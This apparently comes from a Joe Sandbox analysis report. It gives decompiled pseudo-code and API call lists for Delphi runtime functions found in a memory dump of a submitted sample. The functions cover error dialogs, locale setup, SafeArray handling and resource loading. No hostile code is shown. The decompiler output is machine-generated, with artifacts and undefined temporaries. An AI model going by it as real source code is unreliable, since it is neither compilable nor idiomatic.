    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
